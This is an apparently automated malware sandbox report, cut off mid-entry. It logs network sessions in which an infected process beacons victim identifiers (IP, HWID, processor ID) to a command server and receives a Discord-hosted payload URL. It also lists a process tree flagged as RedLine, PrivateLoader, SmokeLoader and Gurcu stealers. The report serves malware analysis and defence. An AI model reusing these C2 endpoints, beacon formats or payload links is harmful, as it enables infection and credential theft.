2023-11-18 09:03:55 UTC	10717	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RUaCFanOLc1kDTx2KNfeqK%2FLsPFKETjYuT5OM1txwxAZEsMHiTu40YTII3AcG%2FnVthcK%2B9C359YzmnpfqbNE%2BsqJ%2FLVTKG0WiZsa30mlVfN63kLknkNCl060VjdbowSIyvPXWy5a"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0b0419b827ad-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:55 UTC	10718	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:55 UTC	10718	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
93	192.168.2.4	49889	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:55 UTC	10717	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:55 UTC	10717	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=RUaCFanOLc1kDTx2KNfeqK%2FLsPFKETjYuT5OM1txwxAZEsMHiTu40YTII3AcG%2FnVthcK%2B9C359YzmnpfqbNE%2BsqJ%2FLVTKG0WiZsa30mlVfN63kLknkNCl060VjdbowSIyvPXWy5a"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0b0419b827ad-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:55 UTC	10718	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:55 UTC	10718	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
94	104.21.89.193	443	192.168.2.4	49891	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:57 UTC	10718	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:03:58 UTC	10718	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=U2cCfe1yvb3o233TydW0JGiVG%2FhyP8lw974H5DA4zX2%2FRIXHZ%2FGsjmnNsUBNGR7tAdec0RNkGzsh7eFGe5MxcZjKQQt7cefNNhnptriwhlzHvGd9Sh7loXA8ZmmWmygKe6VszjDd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0b112f1d3069-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:58 UTC	10719	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:58 UTC	10719	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
94	192.168.2.4	49891	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:57 UTC	10718	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:03:58 UTC	10718	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=U2cCfe1yvb3o233TydW0JGiVG%2FhyP8lw974H5DA4zX2%2FRIXHZ%2FGsjmnNsUBNGR7tAdec0RNkGzsh7eFGe5MxcZjKQQt7cefNNhnptriwhlzHvGd9Sh7loXA8ZmmWmygKe6VszjDd"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0b112f1d3069-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:58 UTC	10719	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:03:58 UTC	10719	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
95	104.21.89.193	443	192.168.2.4	49894	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:58 UTC	10719	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:59 UTC	10719	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EFr0yWtTIo8RqV7b4uGltSnRgXCXKQoAWxLGrF0LNHKqxt5dGo%2BYGyg3%2FJjBQ7Z56YYcWtn6KxCzp9O9%2FUYZvi7sisp1jTK%2BmKz0jDePZvTqpysz1Z8sZ%2FRm1SBI2%2BiAE0bI1wC1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0b17dbfcc3e6-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:59 UTC	10719	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:59 UTC	10719	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
95	192.168.2.4	49894	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:58 UTC	10719	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:03:59 UTC	10719	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:03:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EFr0yWtTIo8RqV7b4uGltSnRgXCXKQoAWxLGrF0LNHKqxt5dGo%2BYGyg3%2FJjBQ7Z56YYcWtn6KxCzp9O9%2FUYZvi7sisp1jTK%2BmKz0jDePZvTqpysz1Z8sZ%2FRm1SBI2%2BiAE0bI1wC1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0b17dbfcc3e6-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:03:59 UTC	10719	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:03:59 UTC	10719	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
96	192.168.2.4	49896	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:59 UTC	10719	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:04:00 UTC	10720	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:04:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=r11U0Prjlh%2BhewIdMTNKgjWpmWzfY9T0NrZvOgl%2BwTfLmVwfPmq1LYHOggRMlS%2F%2BVtj7%2BSruabR8%2BbaVhMLp0KwoUdKPW8CyJLe1J3NEgWqpzBl7utug8iasM5soLN8M5gehmKQh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0b1f2a8ac5e9-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:04:00 UTC	10720	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:04:00 UTC	10720	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
96	104.21.89.193	443	192.168.2.4	49896	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:03:59 UTC	10719	OUT	GET /online.php?country=US&ipaddr=156.146.49.168&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=56F38B4617&ownerid=1444 HTTP/1.1 Host: central-cee-doja.ru Connection: Keep-Alive
2023-11-18 09:04:00 UTC	10720	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:04:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=r11U0Prjlh%2BhewIdMTNKgjWpmWzfY9T0NrZvOgl%2BwTfLmVwfPmq1LYHOggRMlS%2F%2BVtj7%2BSruabR8%2BbaVhMLp0KwoUdKPW8CyJLe1J3NEgWqpzBl7utug8iasM5soLN8M5gehmKQh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0b1f2a8ac5e9-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:04:00 UTC	10720	IN	Data Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a Data Ascii: 7UPDATED
2023-11-18 09:04:00 UTC	10720	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
97	192.168.2.4	49898	104.21.89.193	443	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:04:00 UTC	10720	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:04:01 UTC	10720	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:04:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lzjHLE%2Ftf4YgQfAF8luJoqKGMS4nz1CA%2FoSQWTHx5u2VjSewxp50fBmhG6KqyVXXHYvll8vabiEpKVUKW8u0pPN0407yZ94o6578u6oS8AEO%2BUPWU429%2B5u%2F93270Dxgy23b6gSj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0b262d4cec94-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:04:01 UTC	10721	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:04:01 UTC	10721	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
97	104.21.89.193	443	192.168.2.4	49898	C:\Users\user\AppData\Local\Temp\8427.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-18 09:04:00 UTC	10720	OUT	GET //list.php?id=1444 HTTP/1.1 Host: central-cee-doja.ru
2023-11-18 09:04:01 UTC	10720	IN	HTTP/1.1 200 OK Date: Sat, 18 Nov 2023 09:04:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=lzjHLE%2Ftf4YgQfAF8luJoqKGMS4nz1CA%2FoSQWTHx5u2VjSewxp50fBmhG6KqyVXXHYvll8vabiEpKVUKW8u0pPN0407yZ94o6578u6oS8AEO%2BUPWU429%2B5u%2F93270Dxgy23b6gSj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 827f0b262d4cec94-SEA alt-svc: h3=":443"; ma=86400
2023-11-18 09:04:01 UTC	10721	IN	Data Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe\|4627883NOTASKS
2023-11-18 09:04:01 UTC	10721	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	10:01:53
Start date:	18/11/2023
Path:	C:\Users\user\Desktop\jtfCFDmLdX.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\jtfCFDmLdX.exe
Imagebase:	0xfc0000
File size:	1'641'984 bytes
MD5 hash:	B70F4854E1ECF7923FB88ED64198068A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.1650336900.0000000004F58000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	10:01:54
Start date:	18/11/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe
Imagebase:	0x4c0000
File size:	1'417'728 bytes
MD5 hash:	272E0DC32730BC6AC7850C8C7BA31B61
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 51%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:01:54
Start date:	18/11/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe
Imagebase:	0xed0000
File size:	1'291'776 bytes
MD5 hash:	2E13B79FB62E2F3B5B2038A0298578D1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 32%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:01:54
Start date:	18/11/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe
Imagebase:	0x850000
File size:	2'074'168 bytes
MD5 hash:	4CA9AC47A5200585D4F6693B30CED951
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000002.1659384894.0000000000A01000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
Antivirus matches:	Detection: 32%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:01:54
Start date:	18/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:01:54
Start date:	18/11/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Imagebase:	0xea0000
File size:	103'528 bytes
MD5 hash:	89D41E1CF478A3D3C2C701A27A5692B2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.1825048903.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	10:01:55
Start date:	18/11/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe
Imagebase:	0xe80000
File size:	3'394'104 bytes
MD5 hash:	E7F331448A92EE19814902733D0F6E58
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
Antivirus matches:	Detection: 35%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	10:01:55
Start date:	18/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:01:55
Start date:	18/11/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Imagebase:	0x7ff7699e0000
File size:	103'528 bytes
MD5 hash:	89D41E1CF478A3D3C2C701A27A5692B2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:01:55
Start date:	18/11/2023
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
Imagebase:	0xea0000
File size:	103'528 bytes
MD5 hash:	89D41E1CF478A3D3C2C701A27A5692B2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PrivateLoader, Description: Yara detected PrivateLoader, Source: 00000009.00000002.2013665902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	10:01:55
Start date:	18/11/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe
Imagebase:	0x400000
File size:	37'888 bytes
MD5 hash:	0347EA57AB6936886C20088C49D651D2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000002.1747098618.0000000000160000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000A.00000002.1747098618.0000000000160000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000A.00000002.1747475725.00000000005E1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000A.00000002.1747475725.00000000005E1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 88%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:02:01
Start date:	18/11/2023
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff72b770000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	10:02:04
Start date:	18/11/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe
Imagebase:	0x400000
File size:	194'048 bytes
MD5 hash:	F4AF3A9BB5B128EA7F4A49016AE8DE1F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe, Author: Joe Security Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 75%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	10:02:04
Start date:	18/11/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Imagebase:	0x7ff79fab0000
File size:	71'680 bytes
MD5 hash:	EF3179D498793BF4234F708D3BE28633
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	10:02:24
Start date:	18/11/2023
Path:	C:\Users\user\AppData\Local\Temp\7FE0.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\7FE0.exe
Imagebase:	0x150000
File size:	227'328 bytes
MD5 hash:	9E41D2CC0DE2E45CE74E42DD3608DF3B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 92%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	10:02:25
Start date:	18/11/2023
Path:	C:\Users\user\AppData\Local\Temp\8427.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\8427.exe
Imagebase:	0x800000
File size:	419'840 bytes
MD5 hash:	E2CD9DED5E36DF514FCDCC80134EEBDD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 61%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	10:02:28
Start date:	18/11/2023
Path:	C:\Users\user\AppData\Local\Temp\8F82.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\8F82.exe
Imagebase:	0x19432240000
File size:	114'176 bytes
MD5 hash:	52CC4016261C2CC9311F48B4D84C8D4E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_GurcuStealer, Description: Yara detected Gurcu Stealer, Source: 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	10:02:29
Start date:	18/11/2023
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
